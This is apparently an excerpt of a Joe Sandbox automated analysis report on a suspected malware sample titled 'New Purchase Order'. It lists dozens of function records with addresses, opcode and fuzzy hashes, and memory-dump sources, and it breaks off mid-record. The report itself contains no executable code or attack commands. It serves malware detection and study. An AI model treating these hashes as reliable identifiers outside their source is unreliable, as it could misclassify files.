                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                          • Instruction ID: 43d8af980d55c204edaed4326555fb7009f90729431410d05d8faeec3b8b3800
                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                          • Instruction Fuzzy Hash: 2FF089337529219BD7399A4DDCC0FD6B768EFD5A60F1A0065E6149B260C760EC02C7D0
                          Function 011BC89D Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9dd7a7958f507f5f7cd458fcf07967301add8e265a31861808bff122348969ce
                          • Instruction ID: 4389c8f059d92831b816305cd8eef0957070bca8121a691d0cb8cadae67838fc
                          • Opcode Fuzzy Hash: 9dd7a7958f507f5f7cd458fcf07967301add8e265a31861808bff122348969ce
                          • Instruction Fuzzy Hash: F2F0AF706153059FC318EF28C845A1EB7E4FF98714F40465AB898DB390E734EA01CB96
                          Function 01160854 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                          • Instruction ID: 069867b1baab19b033e574ad56a2d3a105b1f15a30bd363ec6666690433cf801
                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                          • Instruction Fuzzy Hash: E8F0F072A00204AFE328DB25CC00F86B7EDEF9C304F148068A944D7160EBB1DD50C754
                          Function 011BC912 Relevance: .0, Instructions: 34COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 209956dd96efc003af52186b4f7897b834a9dfd9548cd3f9ef0b79c54eb27fcd
                          • Instruction ID: a48bfd8bcfe54e983004d0c0f2ddca5416480c979941e25c81a928c98b93a5d1
                          • Opcode Fuzzy Hash: 209956dd96efc003af52186b4f7897b834a9dfd9548cd3f9ef0b79c54eb27fcd
                          • Instruction Fuzzy Hash: DCF0AF70A00209EFDB08EF69C555A9EB7B4FF18304F008056E855EB385EB34EA01CB91
                          Function 011347FB Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fbbda4997b804b089b9dbbba614504bd5ecc32c792d1acb936f82dd3f4c4525c
                          • Instruction ID: fa4dc2613daca498ac9210fefbc67f2404e2bed032f89b52108a0ad01811eba2
                          • Opcode Fuzzy Hash: fbbda4997b804b089b9dbbba614504bd5ecc32c792d1acb936f82dd3f4c4525c
                          • Instruction Fuzzy Hash: 4CF02E359122E09FE73BCBECC404B21BBC49B80B20F0989EAC58983D6AC324D880CA41
                          Function 011F0115 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 165a63ce1fa66c3374b36ed215559062cb73eea86dc79ae065e51d150812d471
                          • Instruction ID: 63a8c2d17c09c2df74127d4d0d4d4bbcf0cfb3e8288060eaf0df8d7e3ee3d98c
                          • Opcode Fuzzy Hash: 165a63ce1fa66c3374b36ed215559062cb73eea86dc79ae065e51d150812d471
                          • Instruction Fuzzy Hash: 4CF0277751EAC12ACF3A5F2C78583D92F96A75A014F19204DDEA157207CB78C483C720
                          Function 0116C5ED Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72ddbf1ea286955a8d6dcd47c1ffd190922c35ca6dbf742fc8b4da78947e4698
                          • Instruction ID: a9c4d15503c426b3b195ce83ef033fd394b9ee82ec44d85815472d206444d4fd
                          • Opcode Fuzzy Hash: 72ddbf1ea286955a8d6dcd47c1ffd190922c35ca6dbf742fc8b4da78947e4698
                          • Instruction Fuzzy Hash: BEF052714116809FE32E971CC108B217BDC9B407A1F09A421C48AC3B42C365FCA0CAC9
                          Function 01172619 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                          • Instruction ID: 9324e425142cdfcb1fb8516925e77fd9c809d61cdb7068025f694210d900844e
                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                          • Instruction Fuzzy Hash: 76E0D8723006012BE7269E598CC0F47777EEFD2B14F04007AB9045F351CBE2DC0982A4
                          Function 011C6030 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                          • Instruction ID: b28b3ae4df30ef7ea2fb6be0874f8d0ce993d3f1bc2c451dc482de7331ef7a67
                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                          • Instruction Fuzzy Hash: 28F0E572100204DFE3288F09D840F52B7F8EB15B64F02C029E608AB260D339EC50CBA0
                          Function 01130710 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                          • Instruction ID: 7644a790b8fdf50d37e7b484593f607934d95f41e5ce8a7e5ddffa80f3e3cf96
                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                          • Instruction Fuzzy Hash: 05F0E539204B419BDB1FDF19C040A997BE4FB85360B014094F8828B301D731E981CF91
                          Function 011649D0 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                          • Instruction ID: 3ce726346e90f5698cbc2afb85cc2271e445b0aed2d22c959267016937ec407d
                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                          • Instruction Fuzzy Hash: 09E0D832244145BBD3395E598800F6E77AEDBD0FA4F160429E2429B950DB72DC50C7E8
                          Function 01204164 Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b2b150536129fedd2406158fdbbfac0075fb0dcb7c224a15ea1459e3bb9789c7
                          • Instruction ID: 8ffd3db56071ee5950256afad3200920bebe0dc2117dd97951e2eb36b50ed9d1
                          • Opcode Fuzzy Hash: b2b150536129fedd2406158fdbbfac0075fb0dcb7c224a15ea1459e3bb9789c7
                          • Instruction Fuzzy Hash: 23F0E531A355D24FE773E72CD640B51B7E0AF10630F0A8654D60087993C324EC80C650
                          Function 011D678E Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                          • Instruction ID: 009feb92ca0ae1e4346bfe7fffaa9c521e57d6052b9a4a634bf5680f4ee733a4
                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                          • Instruction Fuzzy Hash: 9BE0DF32A00524BBDB259B998D01F9ABEACDBA0EA4F060054B600E7094E630DE00C690
                          Function 012008C0 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                          • Instruction ID: 52951a8d9866cc643dda970a9acfca5d2ece20a6d9cbc1cf80f0c16e07fa26fc
                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                          • Instruction Fuzzy Hash: 5BE02B316503418BDB228A1DC140B73B7E8FF917A0F148169EE0407243D230F942C6D4
                          Function 011325E0 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4bdb54271c1eb8770c1029578c90315ec55ba698efa63a2d4e11c0f8d1f63b82
                          • Instruction ID: a304fc52c9cbdf36b8c8be430e6ebaf6fcd992e781c8c577e102bdf21b02a8df
                          • Opcode Fuzzy Hash: 4bdb54271c1eb8770c1029578c90315ec55ba698efa63a2d4e11c0f8d1f63b82
                          • Instruction Fuzzy Hash: 43E0D872100654ABC335FF29DD01F9B77AAEFA4768F014515F11557594CB34AC11C7C8
                          Function 011EA456 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                          • Instruction ID: d8da4996abfccbe60c434efe2ca9991d18a433f3485ca8f565199d814e4a6e81
                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                          • Instruction Fuzzy Hash: 92E09231010A51DFE73A6F6AD80CB52BAE0FF50715F188C2DA09A024B0C77598D1CA40
                          Function 011B4000 Relevance: .0, Instructions: 22COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                          • Instruction ID: 53fb29caf3dd0d5133f12a9f4caa274cc0837297ab30fddc73a278a6b9dfb41d
                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                          • Instruction Fuzzy Hash: C1E0C2343003058FE719CF1AC080BA27BB6BFD5A10F28C068E9498F606EB32E842CB40
                          Function 0112823B Relevance: .0, Instructions: 21COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                          • Instruction ID: 2ad7eabcd778b7fe8805b9c9695a1aef4412a1b11ce6765912947e19f244f4d5
                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                          • Instruction Fuzzy Hash: 99E0C231004A30EFDB3E3F1ADC00F6276F1FF55B14F21482AE081064A48770ACA2DB59
                          Function 01132050 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ddf065aae13b2e9dc4a70b35e0b6f28f2c0ab10c889b825a7f2632b4aa1efd2c
                          • Instruction ID: 4324fa331b335012111896ac77fb6f71d8ebd9a27d45edc3d8f571e4c90c71a5
                          • Opcode Fuzzy Hash: ddf065aae13b2e9dc4a70b35e0b6f28f2c0ab10c889b825a7f2632b4aa1efd2c
                          • Instruction Fuzzy Hash: 27E08C321005606BC225FA5DED00F5A739AEFA5664F000121F55087A98CB24AC01C798
                          Function 01168A90 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                          • Instruction ID: dde8a935a790cad222ebca66df705b5380f1cc5e7aa50018bd1291c4258e3ab8
                          • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                          • Instruction Fuzzy Hash: 5BE08633111B1487C72CDE18D511B7677A8EF45720F09463EAA5347780C634E554C795
                          Function 0116E59C Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                          • Instruction ID: 94a0d672853ab00256e70d5eb4bd21e089802bddfcf433e37f9b610c884df9fa
                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                          • Instruction Fuzzy Hash: 2ED02233214620AFD736AA1CFC00FC333E8BB88B24F06045AF019C7051C360EC82CA88
                          Function 011AE908 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                          • Instruction ID: 0f448da7c42fad554ba0aae608e778727cc248481f347fa8ac6fecb99507e54c
                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                          • Instruction Fuzzy Hash: C7E0EC359517849BDF1AEF59C640F5ABBB5BB94B40F550058E1085B660C734A901CB40
                          Function 0112A0E3 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                          • Instruction ID: 5c4e37080c9fdb08241d802074c10011657f7a52741f0fc6b7a69b657e04f01a
                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                          • Instruction Fuzzy Hash: 59D0123232607197DB2D66557914F676919AF81AA4F1A006DB90AD3D00C6198C53D6E4
                          Function 0116A830 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                          • Instruction ID: 80cfbb324e51873a21ed9d03374ba16aa1e59de5752298af0c6d246e81ad4b59
                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                          • Instruction Fuzzy Hash: 05D022370E010CBBCB11AF62CC01F903BA8E760BA0F004020B504870A0C63AE850C584
                          Function 0116CA24 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 21a881123018ebd15d8511a09a0cfdd50c8c14e092af649f77133f865f22b868
                          • Instruction ID: 083d2c7a8d92e11cc87cbc3e609b036c22d63e375ba338aba0f8c6873cf5f814
                          • Opcode Fuzzy Hash: 21a881123018ebd15d8511a09a0cfdd50c8c14e092af649f77133f865f22b868
                          • Instruction Fuzzy Hash: 94D092396556129BDF2EDF59CA14B6E7AB8EB14A41B800068EA4592920E36AD8128B90
                          Function 011402A0 Relevance: .0, Instructions: 13COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                          • Instruction ID: 21e493b29b8c11e23591c84fd571bfee75d1794a0ab3ab9cb5e46d9af8200dc9
                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                          • Instruction Fuzzy Hash: 28D09235212E80CFD71E8B0DC5A4F5633A4BB48E44F810490E501CBB62D768E980CA00
                          Function 0116C700 Relevance: .0, Instructions: 12COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                          • Instruction ID: d9953d75d91344fb0a8d4c0c3cb8e07499e8051819a0dd416be73000089933b1
                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                          • Instruction Fuzzy Hash: AAC01232150644AFC715AA95CD01F0177A9E798B40F000021F20447570C631E811D644
                          Function 01150310 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                          • Instruction ID: a95643fa5e114fac62dfb86d5910e3f08d5b16233df80b82ad20d29836015ca5
                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                          • Instruction Fuzzy Hash: DBD01236100248EFCB45DF81C890D9A772AFBD8710F148019FD19077118A31ED62DA50
                          Function 01130750 Relevance: .0, Instructions: 9COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                          • Instruction ID: 76c55db8d7a4ea74908a15c8e1ae4b516da15e3c0d4c2debd53a31a0669c8e81
                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                          • Instruction Fuzzy Hash: 33C04879B12A428FCF1AEB2AD294F4977E4FB44B54F154890E849CBB22E724E801CA10
                          Function 01174340 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e4559c8b83abe8ee411c76d2b76ab384cd4572c4428a22781b6bf3c71957ba6d
                          • Instruction ID: 6cd4db51ad5402ac1e3a98d52a5f59c1936f5580c1e30b8cc9435d538b0e82a7
                          • Opcode Fuzzy Hash: e4559c8b83abe8ee411c76d2b76ab384cd4572c4428a22781b6bf3c71957ba6d
                          • Instruction Fuzzy Hash: 74900231605800129144715849C45469006A7E0301B95C011E0425558CCB148A565761
                          Function 01174650 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a08d3c4d5720e63b43bf9b04a42fd5331cb4104961a8905af1c3128322611821
                          • Instruction ID: e8dede58ee07c6dd0ceefb39617ddde94c5ef24492723c2c6220a2371c8dbc5f
                          • Opcode Fuzzy Hash: a08d3c4d5720e63b43bf9b04a42fd5331cb4104961a8905af1c3128322611821
                          • Instruction Fuzzy Hash: 18900471701500434144715C4D44407F007F7F13013D5C115F0555574CC71CCD55D77D
                          Function 01172B80 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0e737f0c7bb4e0f737d9c8fa7d86a88d4784fefaa50a79afe5304e9a4f663d5f
                          • Instruction ID: b0324eb91e26a7095cc4b4af72b43a72c06ce2605db472cef469f0a4e7f7667e
                          • Opcode Fuzzy Hash: 0e737f0c7bb4e0f737d9c8fa7d86a88d4784fefaa50a79afe5304e9a4f663d5f
                          • Instruction Fuzzy Hash: CF90023120140802D10871584944686500697D0301F95C011A6025659ED76589917631
                          Function 01172BA0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fbab9b424b053fb34441f062e714167c87e216bcf17b7665578de30311a3cd1
                          • Instruction ID: b7b2d7f3dce0c782a76ffbeee7b218ce8c31a59463f69f1b4a1218a841212e9c
                          • Opcode Fuzzy Hash: 1fbab9b424b053fb34441f062e714167c87e216bcf17b7665578de30311a3cd1
                          • Instruction Fuzzy Hash: EE90023160540802D15471584554746500697D0301F95C011A0025658DC7558B557BA1
                          Function 01172BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 480ac293842bae334a12141efe97b6ca81ce1630a902b2a7fd95ec75391f361d
                          • Instruction ID: 6428593f97802b8bb8125b98b647c3a8735c11328a6ea2e7581b74e1d04d451e
                          • Opcode Fuzzy Hash: 480ac293842bae334a12141efe97b6ca81ce1630a902b2a7fd95ec75391f361d
                          • Instruction Fuzzy Hash: E390023120140802D1847158454464A500697D1301FD5C015A0026658DCB158B597BA1
                          Function 01172BE0 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cb7d3aa1ba30c97df3d4c209a354ae18547409fd688336eafbe11dae30627cbe
                          • Instruction ID: 14ada2d2194bf35e55f2256e9e346f384794d1f0d63dc221b83fd82a8f479453
